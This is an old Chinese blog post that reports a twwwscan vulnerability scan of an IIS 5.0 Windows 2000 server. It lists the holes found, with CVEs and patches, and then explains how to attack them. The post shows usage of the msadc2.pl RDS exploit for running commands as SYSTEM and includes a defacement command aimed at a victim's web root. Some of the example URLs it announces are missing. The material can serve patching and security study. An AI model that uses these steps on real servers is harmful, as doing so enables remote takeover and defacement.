(附带黑狐网络的攻击方法)
劲刀狂舞最近用twwwscan扫描了自己的win 2k server,web server(iis5.0),sp1,结果很是令人担心。
从前笔扫描网络主机时,经常发现有这样的漏洞组合,原来是网络管理员的懒惰,使得主机漏洞百出,我只能把这些漏洞拿出来,伤他们的自尊了。
host: 127.0.0.1
port: 80
Server: Microsoft-IIS/5.0
if the webserver is apache,remove unnecessary information
IIS (codebrws.asp) Hole B
/iissamples/sdk/asp/docs/codebrws.asp
solution:delete this file or ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/Viewcode-fix/
RDS Securty Hole(msadcs.dll)
/msadc/msadcs.dll
important patch
CVE-1999-1011
solution:MS99-025.asp
IIS Path Reveal(anything.idq)
/test.idq
IIS Path Reveal
IIS Path Reveal(anything.ida)
/test.ida
IIS Path Reveal
Malform Hit-Highlighting(qfullhit.htw)
CVE-2000-0097
MS00-006.asp
Index Server Security Hole(null.htw)
CVE-2000-0097
MS00-006.asp
FrontPage 2k <=1.1 Path vul
/_vti_bin/shtml.dll/nosuch.htm
CAN-2000-0413
solution:vendor homepage
FrontPage 2k,IIS Multiple (shtml.dll)
/_vti_bin/shtml.dll
good reading Cross-site Scripting Overview
solution:vendor homepage
Frontpage97 fpcount bof(fpcount.exe)
/_vti_bin/fpcount.exe
solution:delete fpcount.exe
FrontPage MS-DOS Device DoS(shtml.exe)
/_vti_bin/shtml.exe
vendor homepage
IIS 4/5 remote execute check method A
important patch
solution:MS00-057
Indexing service for win2k .htw
solution:MS00-084
其中:
_vti_bin/shtml.dll
入侵者利用这个文件将能使您的系统的CPU占用率达到100%
如果用户点击上述指定的链接,脚本将通过HTTP请求从客户端传送给可信任的站点,可信任站点然后将该脚本作为错误信息的一部分返回给客户端。客户端在收到包含该脚本的出错页面时,将执行该脚本,并将赋予来自可信任站点的内容的所有权力赋予该脚本。
使用如下格式的URL:
shtml.exe
如果您使用Front Page作为您的WebServer,那么入侵者能够利用IUSR_
用户和shtml.exe入侵您的机器,做您不希望的事
提交这样的链接,都可能使FrontPage Server Extensions停止响应:
codebrws.asp
描述: 在/iissamples/sdk/asp/docs/下面存在codebrws.asp文件,用下面的路径:
就可以查看到index.asp的源码。实际上任何ascii文件都可以浏览。
Microsoft IIS Unicode解码目录遍历漏洞
这个不用说了,小孩子都知道了。
msadc
IIS的MDAC组件存在一个漏洞可以导致攻击者远程执行
你系统的命令。主要核心问题是存在于RDS Datafactory,默认情况下,
它允许远程命令发送到IIS服务器中,这命令会以设备用户的身份运行,
其一般默认情况下是SYSTEM用户。
利用程序为\cgi\iis_cgi\msadc2.pl,我们看看它的help
[quack@chat quack]$ perl msadc2.pl -h
-- RDS smack v2 - rain forest puppy / ADM / wiretrip --
Usage: msadc.pl -h { -d -X -v }
-h = host you want to scan (ip or domain)
-d = delay between calls, default 1 second
-X = dump Index Server path table, if available
-N = query VbBusObj for NetBIOS name
-V = use VbBusObj instead of ActiveDataFactory
-v = verbose
-e = external dictionary file for step 5
-u <\\host\share\file> = use UNC file
-w = Windows 95 instead of Windows NT
-c = v1 compatibility (three step query)
-s = run only step
Or a -R will resume a (v2) command session
[quack@chat quack]$ perl msadc2.pl -h
-- RDS smack v2 - rain forest puppy / ADM / wiretrip --
Type the command line you want to run (cmd /c assumed):
cmd /c
如果出现cmd /c后,直接键入命令行,就可以以system权限执行命令了。比如xundi教的:
echo hacked by me > d:\inetpub\wwwroot\victimweb\index.
阅读(1219) | 评论(0) | 转发(0) |